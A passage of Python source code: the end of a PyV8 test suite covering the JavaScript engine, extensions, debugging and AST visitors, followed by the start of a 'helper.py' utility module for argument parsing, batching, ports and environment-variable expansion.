ctxt.eval("""
for (i=0; i<10; i++)
add(i);
""")
threads = [threading.Thread(target=run), threading.Thread(target=run)]
with JSLocker() as locker:
JSLocker.startPreemption(100)
for t in threads: t.start()
for t in threads: t.join()
self.assertEqual(20, len(g.result))
class TestEngine(unittest.TestCase):
def testClassProperties(self):
with JSContext() as ctxt:
self.assertTrue(str(JSEngine.version).startswith("3."))
self.assertFalse(JSEngine.dead)
def testCompile(self):
with JSContext() as ctxt:
with JSEngine() as engine:
s = engine.compile("1+2")
self.assertTrue(isinstance(s, _PyV8.JSScript))
self.assertEqual("1+2", s.source)
self.assertEqual(3, int(s.run()))
self.assertRaises(SyntaxError, engine.compile, "1+")
def testPrecompile(self):
with JSContext() as ctxt:
with JSEngine() as engine:
data = engine.precompile("1+2")
self.assertTrue(data)
self.assertEqual(28, len(data))
s = engine.compile("1+2", precompiled=data)
self.assertTrue(isinstance(s, _PyV8.JSScript))
self.assertEqual("1+2", s.source)
self.assertEqual(3, int(s.run()))
self.assertRaises(SyntaxError, engine.precompile, "1+")
def testUnicodeSource(self):
class Global(JSClass):
var = '测试'
def __getattr__(self, name):
if (name if is_py3k else name.decode('utf-8')) == '变量':
return self.var
return JSClass.__getattr__(self, name)
g = Global()
with JSContext(g) as ctxt:
with JSEngine() as engine:
src = """
function 函数() { return 变量.length; }
函数();
var func = function () {};
"""
data = engine.precompile(src)
self.assertTrue(data)
self.assertEqual(68, len(data))
s = engine.compile(src, precompiled=data)
self.assertTrue(isinstance(s, _PyV8.JSScript))
self.assertEqual(toNativeString(src), s.source)
self.assertEqual(2, s.run())
func_name = toNativeString('函数')
self.assertTrue(hasattr(ctxt.locals, func_name))
func = getattr(ctxt.locals, func_name)
self.assertTrue(isinstance(func, _PyV8.JSFunction))
self.assertEqual(func_name, func.name)
self.assertEqual("", func.resname)
self.assertEqual(1, func.linenum)
self.assertEqual(0, func.lineoff)
self.assertEqual(0, func.coloff)
var_name = toNativeString('变量')
setattr(ctxt.locals, var_name, '测试长字符串')
self.assertEqual(6, func())
self.assertEqual("func", ctxt.locals.func.inferredname)
def testExtension(self):
extSrc = """function hello(name) { return "hello " + name + " from javascript"; }"""
extJs = JSExtension("hello/javascript", extSrc)
self.assertTrue(extJs)
self.assertEqual("hello/javascript", extJs.name)
self.assertEqual(extSrc, extJs.source)
self.assertFalse(extJs.autoEnable)
self.assertTrue(extJs.registered)
TestEngine.extJs = extJs
with JSContext(extensions=['hello/javascript']) as ctxt:
self.assertEqual("hello flier from javascript", ctxt.eval("hello('flier')"))
# test the auto enable property
with JSContext() as ctxt:
self.assertRaises(ReferenceError, ctxt.eval, "hello('flier')")
extJs.autoEnable = True
self.assertTrue(extJs.autoEnable)
with JSContext() as ctxt:
self.assertEqual("hello flier from javascript", ctxt.eval("hello('flier')"))
extJs.autoEnable = False
self.assertFalse(extJs.autoEnable)
with JSContext() as ctxt:
self.assertRaises(ReferenceError, ctxt.eval, "hello('flier')")
extUnicodeSrc = """function helloW(name) { return "hello " + name + " from javascript"; }"""
extUnicodeJs = JSExtension("helloW/javascript", extUnicodeSrc)
self.assertTrue(extUnicodeJs)
self.assertEqual("helloW/javascript", extUnicodeJs.name)
self.assertEqual(toNativeString(extUnicodeSrc), extUnicodeJs.source)
self.assertFalse(extUnicodeJs.autoEnable)
self.assertTrue(extUnicodeJs.registered)
TestEngine.extUnicodeJs = extUnicodeJs
with JSContext(extensions=['helloW/javascript']) as ctxt:
self.assertEqual("hello flier from javascript", ctxt.eval("helloW('flier')"))
ret = ctxt.eval("helloW('世界')")
self.assertEqual("hello 世界 from javascript", ret if is_py3k else ret.decode('UTF-8'))
def testNativeExtension(self):
extSrc = "native function hello();"
extPy = JSExtension("hello/python", extSrc, lambda func: lambda name: "hello " + name + " from python", register=False)
self.assertTrue(extPy)
self.assertEqual("hello/python", extPy.name)
self.assertEqual(extSrc, extPy.source)
self.assertFalse(extPy.autoEnable)
self.assertFalse(extPy.registered)
extPy.register()
self.assertTrue(extPy.registered)
TestEngine.extPy = extPy
with JSContext(extensions=['hello/python']) as ctxt:
self.assertEqual("hello flier from python", ctxt.eval("hello('flier')"))
def _testSerialize(self):
data = None
self.assertFalse(JSContext.entered)
with JSContext() as ctxt:
self.assertTrue(JSContext.entered)
#ctxt.eval("function hello(name) { return 'hello ' + name; }")
data = JSEngine.serialize()
self.assertTrue(data)
self.assertTrue(len(data) > 0)
self.assertFalse(JSContext.entered)
#JSEngine.deserialize()
self.assertTrue(JSContext.entered)
self.assertEqual('hello flier', JSContext.current.eval("hello('flier');"))
def testEval(self):
with JSContext() as ctxt:
self.assertEqual(3, int(ctxt.eval("1+2")))
def testGlobal(self):
class Global(JSClass):
version = "1.0"
with JSContext(Global()) as ctxt:
vars = ctxt.locals
# getter
self.assertEqual(Global.version, str(vars.version))
self.assertEqual(Global.version, str(ctxt.eval("version")))
self.assertRaises(ReferenceError, ctxt.eval, "nonexists")
# setter
self.assertEqual(2.0, float(ctxt.eval("version = 2.0")))
self.assertEqual(2.0, float(vars.version))
def testThis(self):
class Global(JSClass):
version = 1.0
with JSContext(Global()) as ctxt:
self.assertEqual("[object Global]", str(ctxt.eval("this")))
self.assertEqual(1.0, float(ctxt.eval("this.version")))
def testObjectBuildInMethods(self):
class Global(JSClass):
version = 1.0
with JSContext(Global()) as ctxt:
self.assertEqual("[object Global]", str(ctxt.eval("this.toString()")))
self.assertEqual("[object Global]", str(ctxt.eval("this.toLocaleString()")))
self.assertEqual(Global.version, float(ctxt.eval("this.valueOf()").version))
self.assertTrue(bool(ctxt.eval("this.hasOwnProperty(\"version\")")))
self.assertFalse(ctxt.eval("this.hasOwnProperty(\"nonexistent\")"))
def testPythonWrapper(self):
class Global(JSClass):
s = [1, 2, 3]
d = {'a': {'b': 'c'}, 'd': ['e', 'f']}
g = Global()
with JSContext(g) as ctxt:
ctxt.eval("""
s[2] = s[1] + 2;
s[0] = s[1];
delete s[1];
""")
self.assertEqual([2, 4], g.s)
self.assertEqual('c', ctxt.eval("d.a.b"))
self.assertEqual(['e', 'f'], ctxt.eval("d.d"))
ctxt.eval("""
d.a.q = 4
delete d.d
""")
self.assertEqual(4, g.d['a']['q'])
self.assertEqual(None, ctxt.eval("d.d"))
def _testMemoryAllocationCallback(self):
alloc = {}
def callback(space, action, size):
alloc[(space, action)] = alloc.setdefault((space, action), 0) + size
JSEngine.setMemoryAllocationCallback(callback)
with JSContext() as ctxt:
self.assertFalse((JSObjectSpace.Code, JSAllocationAction.alloc) in alloc)
ctxt.eval("var o = new Array(1000);")
self.assertTrue((JSObjectSpace.Code, JSAllocationAction.alloc) in alloc)
JSEngine.setMemoryAllocationCallback(None)
class TestDebug(unittest.TestCase):
def setUp(self):
self.engine = JSEngine()
def tearDown(self):
del self.engine
events = []
def processDebugEvent(self, event):
try:
logging.debug("receive debug event: %s", repr(event))
self.events.append(repr(event))
except:
logging.error("fail to process debug event")
logging.debug(traceback.extract_stack())
def testEventDispatch(self):
debugger = JSDebugger()
self.assertTrue(not debugger.enabled)
debugger.onBreak = lambda evt: self.processDebugEvent(evt)
debugger.onException = lambda evt: self.processDebugEvent(evt)
debugger.onNewFunction = lambda evt: self.processDebugEvent(evt)
debugger.onBeforeCompile = lambda evt: self.processDebugEvent(evt)
debugger.onAfterCompile = lambda evt: self.processDebugEvent(evt)
with JSContext() as ctxt:
debugger.enabled = True
self.assertEqual(3, int(ctxt.eval("function test() { text = \"1+2\"; return eval(text) } test()")))
debugger.enabled = False
self.assertRaises(JSError, JSContext.eval, ctxt, "throw 1")
self.assertTrue(not debugger.enabled)
self.assertEqual(4, len(self.events))
class TestProfile(unittest.TestCase):
def _testStart(self):
self.assertFalse(profiler.started)
profiler.start()
self.assertTrue(profiler.started)
profiler.stop()
self.assertFalse(profiler.started)
def _testResume(self):
self.assertTrue(profiler.paused)
self.assertEqual(profiler.Modules.cpu, profiler.modules)
profiler.resume()
profiler.resume(profiler.Modules.heap)
# TODO enable profiler with resume
#self.assertFalse(profiler.paused)
class TestAST(unittest.TestCase):
class Checker(object):
def __init__(self, testcase):
self.testcase = testcase
self.called = []
def __enter__(self):
self.ctxt = JSContext()
self.ctxt.enter()
return self
def __exit__(self, exc_type, exc_value, traceback):
self.ctxt.leave()
def __getattr__(self, name):
return getattr(self.testcase, name)
def test(self, script):
JSEngine().compile(script).visit(self)
return self.called
def onProgram(self, prog):
self.ast = prog.toAST()
self.json = json.loads(prog.toJSON())
for decl in prog.scope.declarations:
decl.visit(self)
for stmt in prog.body:
stmt.visit(self)
def onBlock(self, block):
for stmt in block.statements:
stmt.visit(self)
def onExpressionStatement(self, stmt):
stmt.expression.visit(self)
#print type(stmt.expression), stmt.expression
def testBlock(self):
class BlockChecker(TestAST.Checker):
def onBlock(self, stmt):
self.called.append('block')
self.assertEqual(AST.NodeType.Block, stmt.type)
self.assertTrue(stmt.initializerBlock)
self.assertFalse(stmt.anonymous)
target = stmt.breakTarget
self.assertTrue(target)
self.assertFalse(target.bound)
self.assertTrue(target.unused)
self.assertFalse(target.linked)
self.assertEqual(2, len(stmt.statements))
self.assertEqual(['%InitializeVarGlobal("i", 0);', '%InitializeVarGlobal("j", 0);'], [str(s) for s in stmt.statements])
with BlockChecker(self) as checker:
self.assertEqual(['block'], checker.test("var i, j;"))
self.assertEqual("""FUNC
. NAME ""
. INFERRED NAME ""
. DECLS
. . VAR "i"
. . VAR "j"
. BLOCK INIT
. . CALL RUNTIME InitializeVarGlobal
. . . LITERAL "i"
. . . LITERAL 0
. . CALL RUNTIME InitializeVarGlobal
. . . LITERAL "j"
. . . LITERAL 0
""", checker.ast)
self.assertEqual(['FunctionLiteral', {'name': ''},
['Declaration', {'mode': 'VAR'},
['Variable', {'name': 'i'}]
], ['Declaration', {'mode':'VAR'},
['Variable', {'name': 'j'}]
], ['Block',
['ExpressionStatement', ['CallRuntime', {'name': 'InitializeVarGlobal'},
['Literal', {'handle':'i'}],
['Literal', {'handle': 0}]]],
['ExpressionStatement', ['CallRuntime', {'name': 'InitializeVarGlobal'},
['Literal', {'handle': 'j'}],
['Literal', {'handle': 0}]]]
]
], checker.json)
def testIfStatement(self):
class IfStatementChecker(TestAST.Checker):
def onIfStatement(self, stmt):
self.called.append('if')
self.assertTrue(stmt)
self.assertEqual(AST.NodeType.IfStatement, stmt.type)
self.assertEqual(7, stmt.pos)
stmt.pos = 100
self.assertEqual(100, stmt.pos)
self.assertTrue(stmt.hasThenStatement)
self.assertTrue(stmt.hasElseStatement)
self.assertEqual("((value % 2) == 0)", str(stmt.condition))
self.assertEqual("{ s = \"even\"; }", str(stmt.thenStatement))
self.assertEqual("{ s = \"odd\"; }", str(stmt.elseStatement))
self.assertFalse(stmt.condition.isPropertyName)
with IfStatementChecker(self) as checker:
self.assertEqual(['if'], checker.test("var s; if (value % 2 == 0) { s = 'even'; } else { s = 'odd'; }"))
def testForStatement(self):
class ForStatementChecker(TestAST.Checker):
def onForStatement(self, stmt):
self.called.append('for')
self.assertEqual("{ j += i; }", str(stmt.body))
self.assertEqual("i = 0;", str(stmt.init))
self.assertEqual("(i < 10)", str(stmt.condition))
self.assertEqual("(i++);", str(stmt.nextStmt))
target = stmt.continueTarget
self.assertTrue(target)
self.assertFalse(target.bound)
self.assertTrue(target.unused)
self.assertFalse(target.linked)
self.assertFalse(stmt.fastLoop)
def onForInStatement(self, stmt):
self.called.append('forIn')
self.assertEqual("{ out += name; }", str(stmt.body))
self.assertEqual("name", str(stmt.each))
self.assertEqual("names", str(stmt.enumerable))
def onWhileStatement(self, stmt):
self.called.append('while')
self.assertEqual("{ i += 1; }", str(stmt.body))
self.assertEqual("(i < 10)", str(stmt.condition))
def onDoWhileStatement(self, stmt):
self.called.append('doWhile')
self.assertEqual("{ i += 1; }", str(stmt.body))
self.assertEqual("(i < 10)", str(stmt.condition))
self.assertEqual(281, stmt.conditionPos)
with ForStatementChecker(self) as checker:
self.assertEqual(['for', 'forIn', 'while', 'doWhile'], checker.test("""
var i, j;
for (i=0; i<10; i++) { j+=i; }
var names = new Array();
var out = '';
for (name in names) { out += name; }
while (i<10) { i += 1; }
do { i += 1; } while (i<10);
"""))
def testCallStatements(self):
class CallStatementChecker(TestAST.Checker):
def onVariableDeclaration(self, decl):
self.called.append('var')
var = decl.proxy
if var.name == 's':
self.assertEqual(AST.VarMode.var, decl.mode)
self.assertTrue(var.isValidLeftHandSide)
self.assertFalse(var.isArguments)
self.assertFalse(var.isThis)
def onFunctionDeclaration(self, decl):
self.called.append('func')
var = decl.proxy
if var.name == 'hello':
self.assertEqual(AST.VarMode.var, decl.mode)
self.assertTrue(decl.function)
self.assertEqual('(function hello(name) { s = ("Hello " + name); })', str(decl.function))
elif var.name == 'dog':
self.assertEqual(AST.VarMode.var, decl.mode)
self.assertTrue(decl.function)
self.assertEqual('(function dog(name) { (this).name = name; })', str(decl.function))
def onCall(self, expr):
self.called.append('call')
self.assertEqual("hello", str(expr.expression))
self.assertEqual(['"flier"'], [str(arg) for arg in expr.args])
self.assertEqual(159, expr.pos)
def onCallNew(self, expr):
self.called.append('callNew')
self.assertEqual("dog", str(expr.expression))
self.assertEqual(['"cat"'], [str(arg) for arg in expr.args])
self.assertEqual(191, expr.pos)
def onCallRuntime(self, expr):
self.called.append('callRuntime')
self.assertEqual("InitializeVarGlobal", expr.name)
self.assertEqual(['"s"', '0'], [str(arg) for arg in expr.args])
self.assertFalse(expr.isJsRuntime)
with CallStatementChecker(self) as checker:
self.assertEqual(['var', 'func', 'func', 'callRuntime', 'call', 'callNew'], checker.test("""
var s;
function hello(name) { s = "Hello " + name; }
function dog(name) { this.name = name; }
hello("flier");
new dog("cat");
"""))
def testTryStatements(self):
class TryStatementsChecker(TestAST.Checker):
def onThrow(self, expr):
self.called.append('try')
self.assertEqual('"abc"', str(expr.exception))
self.assertEqual(66, expr.pos)
def onTryCatchStatement(self, stmt):
self.called.append('catch')
self.assertEqual("{ throw \"abc\"; }", str(stmt.tryBlock))
#FIXME self.assertEqual([], stmt.targets)
stmt.tryBlock.visit(self)
self.assertEqual("err", str(stmt.variable.name))
self.assertEqual("{ s = err; }", str(stmt.catchBlock))
def onTryFinallyStatement(self, stmt):
self.called.append('finally')
self.assertEqual("{ throw \"abc\"; }", str(stmt.tryBlock))
#FIXME self.assertEqual([], stmt.targets)
self.assertEqual("{ s += \".\"; }", str(stmt.finallyBlock))
with TryStatementsChecker(self) as checker:
self.assertEqual(['catch', 'try', 'finally'], checker.test("""
var s;
try {
throw "abc";
}
catch (err) {
s = err;
};
try {
throw "abc";
}
finally {
s += ".";
}
"""))
def testLiterals(self):
class LiteralChecker(TestAST.Checker):
def onCallRuntime(self, expr):
expr.args[1].visit(self)
def onLiteral(self, litr):
self.called.append('literal')
self.assertFalse(litr.isPropertyName)
self.assertFalse(litr.isNull)
self.assertFalse(litr.isTrue)
def onRegExpLiteral(self, litr):
self.called.append('regex')
self.assertEqual("test", litr.pattern)
self.assertEqual("g", litr.flags)
def onObjectLiteral(self, litr):
self.called.append('object')
self.assertEqual('constant:"name"="flier",constant:"sex"=true',
",".join(["%s:%s=%s" % (prop.kind, prop.key, prop.value) for prop in litr.properties]))
def onArrayLiteral(self, litr):
self.called.append('array')
self.assertEqual('"hello","world",42',
",".join([str(value) for value in litr.values]))
with LiteralChecker(self) as checker:
self.assertEqual(['literal', 'regex', 'literal', 'literal'], checker.test("""
false;
/test/g;
var o = { name: 'flier', sex: true };
var a = ['hello', 'world', 42];
"""))
def testOperations(self):
class OperationChecker(TestAST.Checker):
def onUnaryOperation(self, expr):
self.called.append('unaryOp')
self.assertEqual(AST.Op.BIT_NOT, expr.op)
self.assertEqual("i", expr.expression.name)
#print "unary", expr
def onIncrementOperation(self, expr):
self.fail()
def onBinaryOperation(self, expr):
self.called.append('binOp')
self.assertEqual(AST.Op.ADD, expr.op)
self.assertEqual("i", str(expr.left))
self.assertEqual("j", str(expr.right))
self.assertEqual(36, expr.pos)
#print "bin", expr
def onAssignment(self, expr):
self.called.append('assign')
self.assertEqual(AST.Op.ASSIGN_ADD, expr.op)
self.assertEqual(AST.Op.ADD, expr.binop)
self.assertEqual("i", str(expr.target))
self.assertEqual("1", str(expr.value))
self.assertEqual(53, expr.pos)
self.assertEqual("(i + 1)", str(expr.binOperation))
self.assertTrue(expr.compound)
def onCountOperation(self, expr):
self.called.append('countOp')
self.assertFalse(expr.prefix)
self.assertTrue(expr.postfix)
self.assertEqual(AST.Op.INC, expr.op)
self.assertEqual(AST.Op.ADD, expr.binop)
self.assertEqual(71, expr.pos)
self.assertEqual("i", expr.expression.name)
#print "count", expr
def onCompareOperation(self, expr):
self.called.append('compOp')
if len(self.called) == 4:
self.assertEqual(AST.Op.EQ, expr.op)
self.assertEqual(88, expr.pos) # i==j
else:
self.assertEqual(AST.Op.EQ_STRICT, expr.op)
self.assertEqual(106, expr.pos) # i===j
self.assertEqual("i", str(expr.left))
self.assertEqual("j", str(expr.right))
#print "comp", expr
def onConditional(self, expr):
self.called.append('conditional')
self.assertEqual("(i > j)", str(expr.condition))
self.assertEqual("i", str(expr.thenExpr))
self.assertEqual("j", str(expr.elseExpr))
self.assertEqual(144, expr.thenExprPos)
self.assertEqual(146, expr.elseExprPos)
with OperationChecker(self) as checker:
self.assertEqual(['binOp', 'assign', 'countOp', 'compOp', 'compOp', 'unaryOp', 'conditional'], checker.test("""
var i, j;
i+j;
i+=1;
i++;
i==j;
i===j;
~i;
i>j?i:j;
"""))
def testSwitchStatement(self):
class SwitchStatementChecker(TestAST.Checker):
def onSwitchStatement(self, stmt):
self.called.append('switch')
self.assertEqual('expr', stmt.tag.name)
self.assertEqual(2, len(stmt.cases))
case = stmt.cases[0]
self.assertFalse(case.isDefault)
self.assertTrue(case.label.isString)
self.assertEqual(0, case.bodyTarget.pos)
self.assertEqual(57, case.position)
self.assertEqual(1, len(case.statements))
case = stmt.cases[1]
self.assertTrue(case.isDefault)
self.assertEqual(None, case.label)
self.assertEqual(0, case.bodyTarget.pos)
self.assertEqual(109, case.position)
self.assertEqual(1, len(case.statements))
with SwitchStatementChecker(self) as checker:
self.assertEqual(['switch'], checker.test("""
switch (expr) {
case 'flier':
break;
default:
break;
}
"""))
if __name__ == '__main__':
if "-v" in sys.argv:
level = logging.DEBUG
else:
level = logging.WARN
if "-p" in sys.argv:
sys.argv.remove("-p")
print("Press any key to continue or attach process #%d..." % os.getpid())
input()
logging.basicConfig(level=level, format='%(asctime)s %(levelname)s %(message)s')
logging.info("testing PyV8 module %s with V8 v%s", __version__, JSEngine.version)
unittest.main()
|
helper.py
|
import asyncio
import functools
import json
import math
import os
import random
import re
import sys
import threading
import time
import uuid
import warnings
from argparse import ArgumentParser, Namespace
from datetime import datetime
from itertools import islice
from types import SimpleNamespace
from typing import (
Tuple,
Optional,
Iterator,
Any,
Union,
List,
Dict,
Set,
Sequence,
Iterable,
)
__all__ = [
'batch_iterator',
'parse_arg',
'random_port',
'random_identity',
'random_uuid',
'expand_env_var',
'colored',
'ArgNamespace',
'is_valid_local_config_source',
'cached_property',
'typename',
'get_public_ip',
'get_internal_ip',
'convert_tuple_to_list',
'run_async',
'deprecated_alias',
'countdown',
]
def deprecated_alias(**aliases):
"""
Usage: pass kwargs where each key is the deprecated argument name and each value is a tuple `(new_name, deprecate_level)`.
Level 0 emits a deprecation warning; level 1 raises an exception.
For example:
.. highlight:: python
.. code-block:: python
@deprecated_alias(input_fn=('inputs', 0), buffer=('input_fn', 0), callback=('on_done', 1), output_fn=('on_done', 1))
:param aliases: maps aliases to new arguments
:return: wrapper
"""
from .excepts import NotSupportedError
def _rename_kwargs(func_name: str, kwargs, aliases):
"""
Raise warnings or exceptions for deprecated arguments.
:param func_name: Name of the function.
:param kwargs: key word arguments from the function which is decorated.
:param aliases: kwargs with key as the deprecated arg name and value be a tuple, (new_name, deprecate_level).
"""
for alias, new_arg in aliases.items():
if not isinstance(new_arg, tuple):
raise ValueError(
f'{new_arg} must be a tuple, with first element as the new name, '
f'second element as the deprecated level: 0 as warning, 1 as exception'
)
if alias in kwargs:
new_name, dep_level = new_arg
if new_name in kwargs:
raise NotSupportedError(
f'{func_name} received both {alias} and {new_name}'
)
if dep_level == 0:
warnings.warn(
f'`{alias}` is renamed to `{new_name}` in `{func_name}()`, the usage of `{alias}` is '
f'deprecated and will be removed in the next version.',
DeprecationWarning,
)
kwargs[new_name] = kwargs.pop(alias)
elif dep_level == 1:
raise NotSupportedError(f'{alias} has been renamed to `{new_name}`')
def deco(f):
"""
Set Decorator function.
:param f: function the decorator is used for
:return: wrapper
"""
@functools.wraps(f)
def wrapper(*args, **kwargs):
"""
Set wrapper function.
:param args: wrapper arguments
:param kwargs: wrapper key word arguments
:return: result of renamed function.
"""
_rename_kwargs(f.__name__, kwargs, aliases)
return f(*args, **kwargs)
return wrapper
return deco
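# Illustrative sketch of `deprecated_alias` (the function and argument names
# below are hypothetical): `input_fn` is soft-deprecated to `inputs` (warning),
# while `buffer` is hard-deprecated (exception).
#
#     @deprecated_alias(input_fn=('inputs', 0), buffer=('inputs', 1))
#     def index(inputs=None):
#         return inputs
#
#     index(input_fn=[1, 2])  # emits a DeprecationWarning, then forwards the value as `inputs`
#     index(buffer=[1, 2])    # raises NotSupportedError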
def get_readable_size(num_bytes: Union[int, float]) -> str:
"""
Transform the bytes into readable value with different units (e.g. 1 KB, 20 MB, 30.1 GB).
:param num_bytes: Number of bytes.
:return: Human readable string representation.
"""
num_bytes = int(num_bytes)
if num_bytes < 1024:
return f'{num_bytes} Bytes'
elif num_bytes < 1024 ** 2:
return f'{num_bytes / 1024:.1f} KB'
elif num_bytes < 1024 ** 3:
return f'{num_bytes / (1024 ** 2):.1f} MB'
else:
return f'{num_bytes / (1024 ** 3):.1f} GB'
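# Illustrative sketch (sample values only) of how `get_readable_size` renders
# different magnitudes given the thresholds above:
#
#     >>> get_readable_size(512)
#     '512 Bytes'
#     >>> get_readable_size(2048)
#     '2.0 KB'
#     >>> get_readable_size(5 * 1024 ** 2)
#     '5.0 MB'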
def batch_iterator(
data: Iterable[Any],
batch_size: int,
axis: int = 0,
) -> Iterator[Any]:
"""
Get an iterator of batches of data.
For example:
.. highlight:: python
.. code-block:: python
for req in batch_iterator(data, batch_size, split_over_axis):
# Do something with batch
:param data: Data source.
:param batch_size: Size of one batch.
:param axis: Determine which axis to iterate for np.ndarray data.
:yield: data
:return: An Iterator of batch data.
"""
import numpy as np
if not batch_size or batch_size <= 0:
yield data
return
if isinstance(data, np.ndarray):
_l = data.shape[axis]
_d = data.ndim
sl = [slice(None)] * _d
if batch_size >= _l:
yield data
return
for start in range(0, _l, batch_size):
end = min(_l, start + batch_size)
sl[axis] = slice(start, end)
yield data[tuple(sl)]
elif isinstance(data, Sequence):
if batch_size >= len(data):
yield data
return
for _ in range(0, len(data), batch_size):
yield data[_ : _ + batch_size]
elif isinstance(data, Iterable):
# as iterator, there is no way to know the length of it
while True:
chunk = tuple(islice(data, batch_size))
if not chunk:
return
yield chunk
else:
raise TypeError(f'unsupported type: {type(data)}')
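# Illustrative sketch (sample data only) of the Sequence branch of
# `batch_iterator`; for numpy arrays, `axis` selects which dimension is sliced
# into blocks of at most `batch_size`.
#
#     >>> list(batch_iterator([1, 2, 3, 4, 5], 2))
#     [[1, 2], [3, 4], [5]]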
def parse_arg(v: str) -> Optional[Union[bool, int, str, list, float]]:
"""
Parse a string argument into `Union[bool, int, str, list, float]`.
:param v: The string to parse.
:return: The parsed value.
"""
m = re.match(r'^[\'"](.*)[\'"]$', v)
if m:
return m.group(1)
if v.startswith('[') and v.endswith(']'):
# function args must be immutable tuples not list
tmp = v.replace('[', '').replace(']', '').strip().split(',')
if len(tmp) > 0:
return [parse_arg(vv.strip()) for vv in tmp]
else:
return []
try:
v = int(v) # parse int parameter
except ValueError:
try:
v = float(v) # parse float parameter
except ValueError:
if len(v) == 0:
# ignore it when the parameter is empty
v = None
elif v.lower() == 'true': # parse boolean parameter
v = True
elif v.lower() == 'false':
v = False
return v
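# A few illustrative conversions performed by `parse_arg` (sample inputs only):
#
#     >>> parse_arg('123')
#     123
#     >>> parse_arg('1.5')
#     1.5
#     >>> parse_arg('true')
#     True
#     >>> parse_arg('[1, two]')
#     [1, 'two']
#     >>> parse_arg('"quoted"')
#     'quoted'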
def countdown(t: int, reason: str = 'I am blocking this thread') -> None:
"""
Display the countdown in console.
For example:
.. highlight:: python
.. code-block:: python
countdown(10, reason=colored('re-fetch access token', 'cyan', attrs=['bold', 'reverse']))
:param t: Countdown time.
:param reason: A string message of reason for this Countdown.
"""
try:
sys.stdout.write('\n')
sys.stdout.flush()
while t > 0:
t -= 1
msg = f'⏳ {colored("%3d" % t, "yellow")}s left: {reason}'
sys.stdout.write(f'\r{msg}')
sys.stdout.flush()
time.sleep(1)
sys.stdout.write('\n')
sys.stdout.flush()
except KeyboardInterrupt:
sys.stdout.write('no more patience? good bye!')
_random_names = (
(
'first',
'great',
'local',
'small',
'right',
'large',
'young',
'early',
'major',
'clear',
'black',
'whole',
'third',
'white',
'short',
'human',
'royal',
'wrong',
'legal',
'final',
'close',
'total',
'prime',
'happy',
'sorry',
'basic',
'aware',
'ready',
'green',
'heavy',
'extra',
'civil',
'chief',
'usual',
'front',
'fresh',
'joint',
'alone',
'rural',
'light',
'equal',
'quiet',
'quick',
'daily',
'urban',
'upper',
'moral',
'vital',
'empty',
'brief',
),
(
'world',
'house',
'place',
'group',
'party',
'money',
'point',
'state',
'night',
'water',
'thing',
'order',
'power',
'court',
'level',
'child',
'south',
'staff',
'woman',
'north',
'sense',
'death',
'range',
'table',
'trade',
'study',
'other',
'price',
'class',
'union',
'value',
'paper',
'right',
'voice',
'stage',
'light',
'march',
'board',
'month',
'music',
'field',
'award',
'issue',
'basis',
'front',
'heart',
'force',
'model',
'space',
'peter',
),
)
def random_name() -> str:
"""
Generate a random name by combining a random adjective and noun from the lists above.
:return: A Random name.
"""
return '_'.join(random.choice(_random_names[j]) for j in range(2))
def random_port() -> Optional[int]:
"""
Get a random available port number from '49153' to '65535'.
:return: A random port.
"""
import threading
import multiprocessing
from contextlib import closing
import socket
def _get_port(port=0):
with multiprocessing.Lock():
with threading.Lock():
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
try:
s.bind(('', port))
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
return s.getsockname()[1]
except OSError:
pass
_port = None
if 'JINA_RANDOM_PORT_MIN' in os.environ or 'JINA_RANDOM_PORT_MAX' in os.environ:
min_port = int(os.environ.get('JINA_RANDOM_PORT_MIN', '49153'))
max_port = int(os.environ.get('JINA_RANDOM_PORT_MAX', '65535'))
all_ports = list(range(min_port, max_port + 1))
random.shuffle(all_ports)
for _port in all_ports:
if _get_port(_port) is not None:
break
else:
raise OSError(
f'can not find an available port between [{min_port}, {max_port}].'
)
else:
_port = _get_port()
return int(_port)
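# Usage sketch: without JINA_RANDOM_PORT_MIN/MAX set, the OS picks any free
# ephemeral port; with them set, a shuffled range is probed until a bindable
# port is found.
#
#     >>> p = random_port()
#     >>> 0 < p <= 65535
#     True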
def random_identity(use_uuid1: bool = False) -> str:
"""
Generate random UUID.
..note::
A MAC-address or time-based ordering (UUID1) can afford increased database performance, since it is less work
to sort numbers that are close together than ones distributed randomly (UUID4).
A second, related point is that UUID1 can be useful in debugging, even if origin data is lost or not
explicitly stored.
:param use_uuid1: use UUID1 instead of UUID4. This is the default Document ID generator.
:return: A random UUID.
"""
return str(random_uuid(use_uuid1))
def random_uuid(use_uuid1: bool = False) -> uuid.UUID:
"""
Get a random UUID.
:param use_uuid1: Use UUID1 if True, else use UUID4.
:return: A random UUID.
"""
return uuid.uuid1() if use_uuid1 else uuid.uuid4()
def expand_env_var(v: str) -> Optional[Union[bool, int, str, list, float]]:
"""
Expand the environment variables.
:param v: String of environment variables.
:return: Parsed environment variables.
"""
if isinstance(v, str):
return parse_arg(os.path.expandvars(v))
else:
return v
def expand_dict(
d: Dict, expand_fn=expand_env_var, resolve_cycle_ref=True
) -> Dict[str, Any]:
"""
Expand variables from YAML file.
:param d: Target Dict.
:param expand_fn: Parsed environment variables.
:param resolve_cycle_ref: Defines if cyclic references should be resolved.
:return: Expanded variables.
"""
expand_map = SimpleNamespace()
pat = re.compile(r'{.+}|\$[a-zA-Z0-9_]*\b')
def _scan(sub_d: Union[Dict, List], p):
if isinstance(sub_d, dict):
for k, v in sub_d.items():
if isinstance(v, dict):
p.__dict__[k] = SimpleNamespace()
_scan(v, p.__dict__[k])
elif isinstance(v, list):
p.__dict__[k] = list()
_scan(v, p.__dict__[k])
else:
p.__dict__[k] = v
elif isinstance(sub_d, list):
for idx, v in enumerate(sub_d):
if isinstance(v, dict):
p.append(SimpleNamespace())
_scan(v, p[idx])
elif isinstance(v, list):
p.append(list())
_scan(v, p[idx])
else:
p.append(v)
def _replace(sub_d: Union[Dict, List], p):
if isinstance(sub_d, Dict):
for k, v in sub_d.items():
if isinstance(v, (dict, list)):
_replace(v, p.__dict__[k])
else:
if isinstance(v, str) and pat.findall(v):
sub_d[k] = _sub(v, p)
elif isinstance(sub_d, List):
for idx, v in enumerate(sub_d):
if isinstance(v, (dict, list)):
_replace(v, p[idx])
else:
if isinstance(v, str) and pat.findall(v):
sub_d[idx] = _sub(v, p)
def _sub(v, p):
if resolve_cycle_ref:
try:
v = v.format(root=expand_map, this=p)
except KeyError:
pass
return expand_fn(v)
_scan(d, expand_map)
_replace(d, expand_map)
return d
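# Illustrative sketch of `expand_dict` resolving an environment variable and a
# `{root...}` reference in a nested dict (assuming HOME=/home/user):
#
#     >>> cfg = {'workdir': '$HOME', 'log': {'path': '{root.workdir}/log'}}
#     >>> expand_dict(cfg)['log']['path']
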